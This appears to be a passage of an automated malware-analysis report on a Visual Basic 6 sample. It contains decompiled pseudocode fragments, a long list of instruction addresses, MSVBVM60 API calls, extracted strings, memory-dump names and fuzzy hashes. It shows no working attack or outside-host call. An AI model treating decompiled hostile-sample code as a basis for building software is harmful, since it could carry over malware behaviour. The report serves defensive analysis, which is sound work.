					_push(_t1150);
					L004013A8();
					_v364 = _t1150;
				}
				 *((intOrPtr*)( *_a4 + 0x714))(_a4);
				_v8 = 0;
				asm("wait");
				_push(E0040DBA3);
				_push( &_v332);
				_t1155 =  &_v316;
				_push(_t1155);
				_push(2);
				L00401432();
				L00401450();
				L00401450();
				L00401450();
				return _t1155;
			}

0x0040bffd
0x0040c00c
0x0040c018
0x0040c020
0x0040c023
0x0040c030
0x0040c039
0x0040c044
0x0040c047
0x0040c051
0x0040c067
0x0040c072
0x0040c079
0x0040c07a
0x0040c07f
0x0040c089
0x0040c099
0x0040c09a
0x0040c0a0
0x0040c0a1
0x0040c0a6
0x0040c0b3
0x0040c0ba
0x0040c0bb
0x0040c0bd
0x0040c0c2
0x0040c0ce
0x0040c0db
0x0040c0f8
0x0040c0dd
0x0040c0dd
0x0040c0e2
0x0040c0e7
0x0040c0ec
0x0040c0ec
0x0040c10a
0x0040c122
0x0040c125
0x0040c127
0x0040c134
0x0040c156
0x0040c136
0x0040c136
0x0040c138
0x0040c13d
0x0040c143
0x0040c149
0x0040c14e
0x0040c14e
0x0040c160
0x0040c17d
0x0040c180
0x0040c182
0x0040c18f
0x0040c1b1
0x0040c191
0x0040c191
0x0040c193
0x0040c198
0x0040c19e
0x0040c1a4
0x0040c1a9
0x0040c1a9
0x0040c1bf
0x0040c1c6
0x0040c1c6
0x0040c1d2
0x0040c1ef
0x0040c1d4
0x0040c1d4
0x0040c1d9
0x0040c1de
0x0040c1e3
0x0040c1e3
0x0040c213
0x0040c217
0x0040c21c
0x0040c234
0x0040c237
0x0040c239
0x0040c246
0x0040c268
0x0040c248
0x0040c248
0x0040c24a
0x0040c24f
0x0040c255
0x0040c25b
0x0040c260
0x0040c260
0x0040c276
0x0040c293
0x0040c278
0x0040c278
0x0040c27d
0x0040c282
0x0040c287
0x0040c287
0x0040c2b7
0x0040c2bb
0x0040c2c0
0x0040c2d8
0x0040c2db
0x0040c2dd
0x0040c2ea
0x0040c30c
0x0040c2ec
0x0040c2ec
0x0040c2ee
0x0040c2f3
0x0040c2f9
0x0040c2ff
0x0040c304
0x0040c304
0x0040c31a
0x0040c337
0x0040c31c
0x0040c31c
0x0040c321
0x0040c326
0x0040c32b
0x0040c32b
0x0040c351
0x0040c35b
0x0040c35f
0x0040c364
0x0040c37f
0x0040c385
0x0040c387
0x0040c394
0x0040c3b9
0x0040c396
0x0040c396
0x0040c39b
0x0040c3a0
0x0040c3a6
0x0040c3ac
0x0040c3b1
0x0040c3b1
0x0040c3c3
0x0040c3c9
0x0040c3d3
0x0040c3d6
0x0040c3ee
0x0040c3fb
0x0040c3fc
0x0040c3fd
0x0040c3fe
0x0040c407
0x0040c415
0x0040c41b
0x0040c428
0x0040c44a
0x0040c42a
0x0040c42a
0x0040c42f
0x0040c434
0x0040c437
0x0040c43d
0x0040c442
0x0040c442
0x0040c454
0x0040c45c
0x0040c460
0x0040c464
0x0040c465
0x0040c467
0x0040c46c
0x0040c475
0x0040c481
0x0040c49e
0x0040c483
0x0040c483
0x0040c488
0x0040c48d
0x0040c492
0x0040c492
0x0040c4c2
0x0040c4c6
0x0040c4cb
0x0040c4e3
0x0040c4e9
0x0040c4eb
0x0040c4f8
0x0040c51d
0x0040c4fa
0x0040c4fa
0x0040c4ff
0x0040c504
0x0040c50a
0x0040c510
0x0040c515
0x0040c515
0x0040c52b
0x0040c548
0x0040c52d
0x0040c52d
0x0040c532
0x0040c537
0x0040c53c
0x0040c53c
0x0040c56c
0x0040c570
0x0040c575
0x0040c58d
0x0040c590
0x0040c592
0x0040c59f
0x0040c5c1
0x0040c5a1
0x0040c5a1
0x0040c5a3
0x0040c5a8
0x0040c5ae
0x0040c5b4
0x0040c5b9
0x0040c5b9
0x0040c5cf
0x0040c5ec
0x0040c5d1
0x0040c5d1
0x0040c5d6
0x0040c5db
0x0040c5e0
0x0040c5e0
0x0040c610
0x0040c614
0x0040c619
0x0040c634
0x0040c63a
0x0040c63c
0x0040c649
0x0040c66e
0x0040c64b
0x0040c64b
0x0040c650
0x0040c655
0x0040c65b
0x0040c661
0x0040c666
0x0040c666
0x0040c67c
0x0040c699
0x0040c67e
0x0040c67e
0x0040c683
0x0040c688
0x0040c68d
0x0040c68d
0x0040c6b3
0x0040c6bd
0x0040c6c1
0x0040c6c6
0x0040c6de
0x0040c6e4
0x0040c6e6
0x0040c6f3
0x0040c718
0x0040c6f5
0x0040c6f5
0x0040c6fa
0x0040c6ff
0x0040c705
0x0040c70b
0x0040c710
0x0040c710
0x0040c722
0x0040c728
0x0040c732
0x0040c738
0x0040c742
0x0040c74c
0x0040c756
0x0040c760
0x0040c770
0x0040c77a
0x0040c780
0x0040c78a
0x0040c790
0x0040c79d
0x0040c7a3
0x0040c7ad
0x0040c7b0
0x0040c7c4
0x0040c7d1
0x0040c7d2
0x0040c7d3
0x0040c7d4
0x0040c7ef
0x0040c7fc
0x0040c809
0x0040c80a
0x0040c80b
0x0040c80c
0x0040c81c
0x0040c834
0x0040c853
0x0040c858
0x0040c86a
0x0040c879
0x0040c885
0x0040c8a2
0x0040c887
0x0040c887
0x0040c88c
0x0040c891
0x0040c896
0x0040c896
0x0040c8bc
0x0040c8c6
0x0040c8ca
0x0040c8cf
0x0040c8e7
0x0040c8ea
0x0040c8ec
0x0040c8f9
0x0040c91b
0x0040c8fb
0x0040c8fb
0x0040c8fd
0x0040c902
0x0040c908
0x0040c90e
0x0040c913
0x0040c913
0x0040c922
0x0040c92c
0x0040c936
0x0040c93f
0x0040c949
0x0040c956
0x0040c95c
0x0040c966
0x0040c969
0x0040c987
0x0040c994
0x0040c995
0x0040c996
0x0040c997
0x0040c9ab
0x0040c9b1
0x0040c9be
0x0040c9bf
0x0040c9c0
0x0040c9c1
0x0040c9c5
0x0040c9d2
0x0040c9d3
0x0040c9d4
0x0040c9d5
0x0040c9de
0x0040c9e4
0x0040c9f1
0x0040ca13
0x0040c9f3
0x0040c9f3
0x0040c9f8
0x0040c9fd
0x0040ca00
0x0040ca06
0x0040ca0b
0x0040ca0b
0x0040ca20
0x0040ca26
0x0040ca31
0x0040ca3d
0x0040ca5a
0x0040ca3f
0x0040ca3f
0x0040ca44
0x0040ca49
0x0040ca4e
0x0040ca4e
0x0040ca7e
0x0040ca82
0x0040ca87
0x0040caa2
0x0040caa8
0x0040caaa
0x0040cab7
0x0040cadc
0x0040cab9
0x0040cab9
0x0040cabe
0x0040cac3
0x0040cac9
0x0040cacf
0x0040cad4
0x0040cad4
0x0040caea
0x0040cb07
0x0040caec
0x0040caec
0x0040caf1
0x0040caf6
0x0040cafb
0x0040cafb
0x0040cb2b
0x0040cb2f
0x0040cb34
0x0040cb4f
0x0040cb55
0x0040cb57
0x0040cb64
0x0040cb89
0x0040cb66
0x0040cb66
0x0040cb6b
0x0040cb70
0x0040cb76
0x0040cb7c
0x0040cb81
0x0040cb81
0x0040cb97
0x0040cbb4
0x0040cb99
0x0040cb99
0x0040cb9e
0x0040cba3
0x0040cba8
0x0040cba8
0x0040cbd8
0x0040cbdc
0x0040cbe1
0x0040cbfc
0x0040cc02
0x0040cc04
0x0040cc11
0x0040cc36
0x0040cc13
0x0040cc13
0x0040cc18
0x0040cc1d
0x0040cc23
0x0040cc29
0x0040cc2e
0x0040cc2e
0x0040cc44
0x0040cc61
0x0040cc46
0x0040cc46
0x0040cc4b
0x0040cc50
0x0040cc55
0x0040cc55
0x0040cc7b
0x0040cc85
0x0040cc89
0x0040cc8e
0x0040cca6
0x0040ccac
0x0040ccae
0x0040ccbb
0x0040cce0
0x0040ccbd
0x0040ccbd
0x0040ccc2
0x0040ccc7
0x0040cccd
0x0040ccd3
0x0040ccd8
0x0040ccd8
0x0040ccf5
0x0040ccfa
0x0040ccfd
0x0040cd04
0x0040cd09
0x0040cd0f
0x0040cd1f
0x0040cd3e
0x0040cd6e
0x0040cd74
0x0040cd81
0x0040cda3
0x0040cd83
0x0040cd83
0x0040cd88
0x0040cd8d
0x0040cd90
0x0040cd96
0x0040cd9b
0x0040cd9b
0x0040cdc0
0x0040cdc5
0x0040cdce
0x0040cddb
0x0040cde1
0x0040cde3
0x0040cdf0
0x0040ce12
0x0040cdf2
0x0040cdf2
0x0040cdf7
0x0040cdfc
0x0040cdff
0x0040ce05
0x0040ce0a
0x0040ce0a
0x0040ce19
0x0040ce23
0x0040ce2d
0x0040ce37
0x0040ce41
0x0040ce48
0x0040ce58
0x0040ce5f
0x0040ce66
0x0040ce6d
0x0040ce74
0x0040ce75
0x0040ce78
0x0040ce79
0x0040ce7e
0x0040daf4
0x0040ce89
0x0040ce93
0x0040cea9
0x0040ceb4
0x0040ceba
0x0040cec4
0x0040cef5
0x0040cefb
0x0040cf08
0x0040cf2a
0x0040cf0a
0x0040cf0a
0x0040cf0f
0x0040cf14
0x0040cf17
0x0040cf1d
0x0040cf22
0x0040cf22
0x0040cf37
0x0040cf43
0x0040cf60
0x0040cf45
0x0040cf45
0x0040cf4a
0x0040cf4f
0x0040cf54
0x0040cf54
0x0040cf84
0x0040cf88
0x0040cf8d
0x0040cfa8
0x0040cfab
0x0040cfad
0x0040cfba
0x0040cfdc
0x0040cfbc
0x0040cfbc
0x0040cfbe
0x0040cfc3
0x0040cfc9
0x0040cfcf
0x0040cfd4
0x0040cfd4
0x0040cfea
0x0040d007
0x0040cfec
0x0040cfec
0x0040cff1
0x0040cff6
0x0040cffb
0x0040cffb
0x0040d02b
0x0040d02f
0x0040d034
0x0040d04f
0x0040d055
0x0040d057
0x0040d064
0x0040d089
0x0040d066
0x0040d066
0x0040d06b
0x0040d070
0x0040d076
0x0040d07c
0x0040d081
0x0040d081
0x0040d097
0x0040d0b4
0x0040d099
0x0040d099
0x0040d09e
0x0040d0a3
0x0040d0a8
0x0040d0a8
0x0040d0d8
0x0040d0dc
0x0040d0e1
0x0040d0f9
0x0040d0ff
0x0040d101
0x0040d10e
0x0040d133
0x0040d110
0x0040d110
0x0040d115
0x0040d11a
0x0040d120
0x0040d126
0x0040d12b
0x0040d12b
0x0040d141
0x0040d15e
0x0040d143
0x0040d143
0x0040d148
0x0040d14d
0x0040d152
0x0040d152
0x0040d182
0x0040d186
0x0040d18b
0x0040d1a3
0x0040d1a9
0x0040d1ab
0x0040d1b8
0x0040d1dd
0x0040d1ba
0x0040d1ba
0x0040d1bf
0x0040d1c4
0x0040d1ca
0x0040d1d0
0x0040d1d5
0x0040d1d5
0x0040d1e4
0x0040d1ee
0x0040d1f8
0x0040d202
0x0040d20f
0x0040d215
0x0040d21f
0x0040d222
0x0040d232
0x0040d23b
0x0040d241
0x0040d24e
0x0040d259
0x0040d265
0x0040d26b
0x0040d275
0x0040d289
0x0040d296
0x0040d297
0x0040d298
0x0040d299
0x0040d2b3
0x0040d2cd
0x0040d2da
0x0040d2db
0x0040d2dc
0x0040d2dd
0x0040d2e6
0x0040d2ef
0x0040d2f7
0x0040d2fb
0x0040d2ff
0x0040d303
0x0040d304
0x0040d306
0x0040d314
0x0040d31b
0x0040d31c
0x0040d31e
0x0040d323
0x0040d32d
0x0040d34a
0x0040d32f
0x0040d32f
0x0040d334
0x0040d339
0x0040d33e
0x0040d33e
0x0040d36e
0x0040d372
0x0040d377
0x0040d38f
0x0040d392
0x0040d394
0x0040d3a1
0x0040d3c3
0x0040d3a3
0x0040d3a3
0x0040d3a5
0x0040d3aa
0x0040d3b0
0x0040d3b6
0x0040d3bb
0x0040d3bb
0x0040d3d1
0x0040d3ee
0x0040d3d3
0x0040d3d3
0x0040d3d8
0x0040d3dd
0x0040d3e2
0x0040d3e2
0x0040d412
0x0040d416
0x0040d41b
0x0040d436
0x0040d43c
0x0040d43e
0x0040d44b
0x0040d470
0x0040d44d
0x0040d44d
0x0040d452
0x0040d457
0x0040d45d
0x0040d463
0x0040d468
0x0040d468
0x0040d47e
0x0040d49b
0x0040d480
0x0040d480
0x0040d485
0x0040d48a
0x0040d48f
0x0040d48f
0x0040d4bf
0x0040d4c3
0x0040d4c8
0x0040d4e0
0x0040d4e3
0x0040d4e5
0x0040d4f2
0x0040d514
0x0040d4f4
0x0040d4f4
0x0040d4f6
0x0040d4fb
0x0040d501
0x0040d507
0x0040d50c
0x0040d50c
0x0040d51b
0x0040d51d
0x0040d51f
0x0040d528
0x0040d529
0x0040d52e
0x0040d538
0x0040d555
0x0040d53a
0x0040d53a
0x0040d53f
0x0040d544
0x0040d549
0x0040d549
0x0040d56f
0x0040d579
0x0040d57d
0x0040d582
0x0040d59d
0x0040d5a0
0x0040d5a2
0x0040d5af
0x0040d5d1
0x0040d5b1
0x0040d5b1
0x0040d5b3
0x0040d5b8
0x0040d5be
0x0040d5c4
0x0040d5c9
0x0040d5c9
0x0040d5de
0x0040d5e4
0x0040d5eb
0x0040d5f0
0x0040d5f9
0x0040d5ff
0x0040d609
0x0040d60c
0x0040d61c
0x0040d622
0x0040d62c
0x0040d64c
0x0040d688
0x0040d68e
0x0040d69b
0x0040d6bd
0x0040d69d
0x0040d69d
0x0040d6a2
0x0040d6a7
0x0040d6aa
0x0040d6b0
0x0040d6b5
0x0040d6b5
0x0040d6ca
0x0040d6d0
0x0040d6d4
0x0040d6d8
0x0040d6dc
0x0040d6e0
0x0040d6e1
0x0040d6e3
0x0040d6f1
0x0040d6f8
0x0040d6f9
0x0040d6fb
0x0040d700
0x0040d70a
0x0040d727
0x0040d70c
0x0040d70c
0x0040d711
0x0040d716
0x0040d71b
0x0040d71b
0x0040d74b
0x0040d74f
0x0040d754
0x0040d76c
0x0040d772
0x0040d774
0x0040d781
0x0040d7a6
0x0040d783
0x0040d783
0x0040d788
0x0040d78d
0x0040d793
0x0040d799
0x0040d79e
0x0040d79e
0x0040d7b4
0x0040d7d1
0x0040d7b6
0x0040d7b6
0x0040d7bb
0x0040d7c0
0x0040d7c5
0x0040d7c5
0x0040d7f5
0x0040d7f9
0x0040d7fe
0x0040d819
0x0040d81f
0x0040d821
0x0040d82e
0x0040d853
0x0040d830
0x0040d830
0x0040d835
0x0040d83a
0x0040d840
0x0040d846
0x0040d84b
0x0040d84b
0x0040d861
0x0040d87e
0x0040d863
0x0040d863
0x0040d868
0x0040d86d
0x0040d872
0x0040d872
0x0040d8a2
0x0040d8a6
0x0040d8ab
0x0040d8c6
0x0040d8c9
0x0040d8cb
0x0040d8d8
0x0040d8fa
0x0040d8da
0x0040d8da
0x0040d8dc
0x0040d8e1
0x0040d8e7
0x0040d8ed
0x0040d8f2
0x0040d8f2
0x0040d908
0x0040d925
0x0040d90a
0x0040d90a
0x0040d90f
0x0040d914
0x0040d919
0x0040d919
0x0040d93f
0x0040d949
0x0040d94d
0x0040d952
0x0040d96d
0x0040d973
0x0040d975
0x0040d982
0x0040d9a7
0x0040d984
0x0040d984
0x0040d989
0x0040d98e
0x0040d994
0x0040d99a
0x0040d99f
0x0040d99f
0x0040d9b4
0x0040d9c0
0x0040d9cc
0x0040d9d2
0x0040d9df
0x0040d9e5
0x0040d9ef
0x0040d9f2
0x0040da0a
0x0040da17
0x0040da24
0x0040da25
0x0040da26
0x0040da27
0x0040da2f
0x0040da3a
0x0040da47
0x0040da48
0x0040da49
0x0040da4a
0x0040da53
0x0040da6b
0x0040da70
0x0040da79
0x0040da8d
0x0040da93
0x0040daa0
0x0040dac2
0x0040daa2
0x0040daa2
0x0040daa7
0x0040daac
0x0040daaf
0x0040dab5
0x0040daba
0x0040daba
0x0040dad2
0x0040dadd
0x0040dae4
0x0040dae5
0x0040dae8
0x0040dae9
0x0040daee
0x0040daee
0x0040db09
0x0040db0f
0x0040db16
0x0040db17
0x0040db78
0x0040db79
0x0040db7f
0x0040db80
0x0040db82
0x0040db8d
0x0040db95
0x0040db9d
0x0040dba2

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040C018
__vbaVarDup.MSVBVM60 ref: 0040C067
#543.MSVBVM60(?,?), ref: 0040C07A
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0040C0A1
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0040C0BD
__vbaNew2.MSVBVM60(0040B088,004103C4,?,?,004012A6), ref: 0040C0E7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B078,0000001C), ref: 0040C149
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B098,00000064), ref: 0040C1A4
__vbaFreeObj.MSVBVM60(00000000,?,0040B098,00000064), ref: 0040C1C6
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,?,004012A6), ref: 0040C1DE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C217
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A8,00000048), ref: 0040C25B
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040C282
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C2BB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,00000048), ref: 0040C2FF
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040C326
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C35F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0C8,000000E8), ref: 0040C3AC
__vbaChkstk.MSVBVM60(00514F93,?), ref: 0040C3EE
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD7C,000006FC,?,?,00514F93,?), ref: 0040C43D
__vbaFreeStr.MSVBVM60(?,?,00514F93,?), ref: 0040C454
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,00514F93,?), ref: 0040C467
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,004012A6), ref: 0040C475
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,?,?,?,?,?,004012A6), ref: 0040C48D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C4C6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,000000F0), ref: 0040C510
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040C537
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C570
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0C8,00000048), ref: 0040C5B4
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040C5DB
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C614
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A8,00000128), ref: 0040C661
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040C688
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C6C1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A8,000001DC), ref: 0040C70B
__vbaChkstk.MSVBVM60(00000008), ref: 0040C7C4
__vbaChkstk.MSVBVM60(?,?,000017DD,Underbevidsthed,003554E3,00000008), ref: 0040C7FC
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,000017DD,Underbevidsthed,003554E3,00000008), ref: 0040C834
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040C853
__vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040C879
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040C891
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C8CA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A8,00000048), ref: 0040C90E
__vbaChkstk.MSVBVM60(667A4DB0,00005B07,?), ref: 0040C987
__vbaChkstk.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040C9B1
__vbaChkstk.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040C9C5
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD7C,00000700,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA06
__vbaFreeObj.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA26
__vbaFreeVar.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA31
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA49
__vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CA82
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,000000A0,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CACF
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CAF6
__vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB2F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B0A8,000001A0,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB7C
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBA3
__vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBDC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,00000128,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC29
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC50
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC89
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,000000F0,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CCD3
__vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,?,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CCF5
__vbaI4Var.MSVBVM60(?), ref: 0040CD04
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD7C,00000704), ref: 0040CD96
__vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040CDC0
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?), ref: 0040CDCE
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD4C,000002B4), ref: 0040CE05
__vbaVarForInit.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040CE79
__vbaVarDup.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040CEA9
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD7C,00000708), ref: 0040CF1D
__vbaFreeVar.MSVBVM60(00000000,004011C8,0040AD7C,00000708), ref: 0040CF37
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040CF4F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CF88
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B0B8,00000068), ref: 0040CFCF
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040CFF6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D02F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0C8,00000090), ref: 0040D07C
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040D0A3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D0DC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A8,000000F8), ref: 0040D126
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040D14D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D186
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A8,000001DC), ref: 0040D1D0
__vbaStrMove.MSVBVM60(00000000,?,0040B0A8,000001DC), ref: 0040D24E
__vbaChkstk.MSVBVM60(00000003), ref: 0040D289
__vbaChkstk.MSVBVM60(?,?,418E7D50,?,?,?,00000008,00000003), ref: 0040D2CD
__vbaFreeStr.MSVBVM60(?,?,?,00000008,00000003), ref: 0040D2EF
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,00000008,00000003), ref: 0040D306
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0040D31E
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040D339
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D372
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A8,00000048), ref: 0040D3B6
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040D3DD
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D416
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,000000E8), ref: 0040D463
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040D48A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D4C3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0C8,00000058), ref: 0040D507
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040D529
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040D544
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D57D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,00000060), ref: 0040D5C4
__vbaI4Var.MSVBVM60(?), ref: 0040D5EB
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD7C,0000070C,?,?,?,?,?), ref: 0040D6B0
__vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?), ref: 0040D6E3
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0040D6FB
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040D716
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D74F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A8,00000170), ref: 0040D799
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040D7C0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D7F9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,00000110), ref: 0040D846
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040D86D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D8A6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,00000070), ref: 0040D8ED
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040D914
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D94D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,00000128), ref: 0040D99A
__vbaChkstk.MSVBVM60(?,?,?), ref: 0040DA17
__vbaChkstk.MSVBVM60(00005D72,?,?,?,?), ref: 0040DA3A
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?), ref: 0040DA6B
__vbaFreeVar.MSVBVM60 ref: 0040DA79
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD7C,00000710), ref: 0040DAB5
__vbaVarMove.MSVBVM60(00000000,004011C8,0040AD7C,00000710), ref: 0040DAD2
__vbaVarForNext.MSVBVM60(?,?,?), ref: 0040DAE9
__vbaFreeVarList.MSVBVM60(00000002,?,?,0040DBA3), ref: 0040DB82
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DB8D
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DB95
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DB9D

Strings

BZ, xrefs: 0040C742
T5, xrefs: 0040C756
RRETS, xrefs: 0040CE89
Underbevidsthed, xrefs: 0040C7DC
z_, xrefs: 0040CE2D
overstiges, xrefs: 0040C93F
21:21:21, xrefs: 0040C047

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$New2$Free$ChkstkList$Move$CallLate$#543InitNext
String ID: 21:21:21$RRETS$Underbevidsthed$overstiges$z_$BZ$T5
API String ID: 2874494357-2751574839
Opcode ID: 7de7d04aaf4ebb2dfb744c4d144845e01174d5123884ef943c46217ad142f4bf
Instruction ID: 53591be67110cf8b6252b87729a25e45f71896a20fbeb22461bf3103313d8624
Opcode Fuzzy Hash: 7de7d04aaf4ebb2dfb744c4d144845e01174d5123884ef943c46217ad142f4bf
Instruction Fuzzy Hash: 2CF2E37190022C9FDB21DF90CC49BDDBBB4BB08304F1045EAE549BB2A1DBB95AC59F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAF8, Relevance: 33.3, APIs: 15, Strings: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040EAF8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a52) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v52;
				void* _v56;
				char _v60;
				char _v64;
				char _v80;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v96;
				signed int _v100;
				char* _t39;
				signed int _t43;
				char* _t44;
				char* _t46;
				intOrPtr _t66;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_push(0x50);
				L004012A0();
				_v12 = _t66;
				_v8 = 0x401250;
				L004013E4();
				L004013E4();
				if( *0x410010 != 0) {
					_v96 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v96 = 0x410010;
				}
				_t39 =  &_v60;
				L004013CC();
				_v84 = _t39;
